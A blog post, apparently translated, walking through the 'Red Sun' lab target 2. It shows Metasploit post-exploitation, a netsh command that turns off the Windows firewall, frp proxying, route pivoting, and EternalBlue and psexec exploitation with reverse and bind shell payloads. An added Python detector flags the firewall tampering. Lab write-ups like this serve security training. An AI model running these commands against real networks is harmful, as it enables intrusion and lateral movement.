Red Sun target machine 2 (红日靶机二)

Information gathering

Failed, so switch to a different vulnerability

Trojan (payload) upload

meterpreter > background

msf5 exploit(multi/handler) >  use post/multi/recon/local_exploit_suggester

msf5 post(multi/recon/local_exploit_suggester) > set session 1

msf5 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.1.128 - Collecting local exploits for java/windows...

[-] 192.168.1.128 - No suggestions available.

[*] Post module execution completed

msf5 post(multi/recon/local_exploit_suggester) >

Process migration

Automatic process migration:

run post/windows/manage/migrate

Privilege escalation

Set the beacon interval (heartbeat)

Dump credentials

Processes

Port scan of the 10.x network segment

List users

Domain information

Check the firewall state and turn it off

shell netsh firewall show state

shell netsh advfirewall set allprofiles state off
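Added example (not from the original post, not part of any tool it uses): a small Python detector that flags the host-firewall tampering shown above when it appears in process-creation telemetry. The event format, host names and command lines in SAMPLE_EVENTS are constructed for illustration; the rules match the `netsh advfirewall ... state off` command (which disables all profiles at once), the `netsh firewall show state` enumeration, and Windows `route add/delete/change` invocations, so it generalizes slightly beyond the two commands on this page.

```python
"""Flag host-firewall tampering and route changes in process-creation events.

Added example, not part of the original post. The event format and the
sample lines below are constructed for illustration.
"""
import re
from dataclasses import dataclass

# Constructed process-creation events, hypothetical format:
# "<host> <parent_image> -> <image> <command line>"
SAMPLE_EVENTS = [
    "WEB01 cmd.exe -> netsh.exe netsh firewall show state",
    "WEB01 cmd.exe -> netsh.exe netsh advfirewall set allprofiles state off",
    "WEB01 cmd.exe -> route.exe route add 10.10.10.0 mask 255.255.255.0 10.10.10.1",
    "PC1 explorer.exe -> notepad.exe notepad.exe report.txt",
    "DC01 cmd.exe -> netsh.exe netsh advfirewall set currentprofile state on",
]

# Detection rules: (name, severity, regex applied to the command line).
RULES = [
    ("firewall_disabled", "high",
     re.compile(r"netsh\s+advfirewall\s+set\s+\S+\s+state\s+off", re.I)),
    ("firewall_state_enum", "low",
     re.compile(r"netsh\s+firewall\s+show\s+state", re.I)),
    ("route_modified", "medium",
     re.compile(r"^route(\.exe)?\s+(add|delete|change)\b", re.I)),
]


@dataclass
class Finding:
    host: str
    rule: str
    severity: str
    command: str


def parse_event(line):
    """Split one constructed event line into (host, image, command line)."""
    host, rest = line.split(" ", 1)
    _, spawned = rest.split(" -> ", 1)
    image, _, cmdline = spawned.partition(" ")
    return host, image, cmdline


def scan(lines):
    """Return a Finding for every (event, rule) pair whose command line matches."""
    findings = []
    for line in lines:
        host, _image, cmdline = parse_event(line)
        for name, severity, pattern in RULES:
            if pattern.search(cmdline):
                findings.append(Finding(host, name, severity, cmdline))
    return findings


def hosts_with_firewall_disabled(lines):
    """Hosts where the firewall was turned off; useful as an alert trigger."""
    return sorted({f.host for f in scan(lines) if f.rule == "firewall_disabled"})


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.host}: {f.rule} <- {f.command}")
```

Turning the firewall back on (the DC01 line) is deliberately not flagged; only the disable and the enumeration that usually precedes it are, so the rule stays quiet on normal administration.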

Lateral movement

Ticket forging

msf

Create a reverse SOCKS proxy with frp

Edit the frps.ini file

vim frps.ini

Start frp

./frps -c frps.ini

Edit the frpc.ini file

frpc.exe -c frpc.ini

Add a route

route add 10.10.10.0 255.255.255.0 1

route print

msf5 exploit(multi/handler) > use auxiliary/scanner/smb/smb_ms17_010

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.10.10.10

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

Attempt exploitation

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 4440

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.10

msf5 exploit(windows/smb/ms17_010_eternalblue) > run

msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/ms17_010_psexec

msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.10

rhost => 10.10.10.10

msf5 exploit(windows/smb/ms17_010_psexec) > set rport 445

msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/x64/shell/bind_tcp

payload => windows/x64/shell/bind_tcp

msf5 exploit(windows/smb/ms17_010_psexec) > run

Reference articles

https://www.jianshu.com/p/45ad9a534fb4

https://www.cnblogs.com/R1card0/articles/12960290.html

http://yugod.xmutsec.com/index.php/2020/07/15/53.html

posted @ 2020-08-23 13:34 bingtanghulu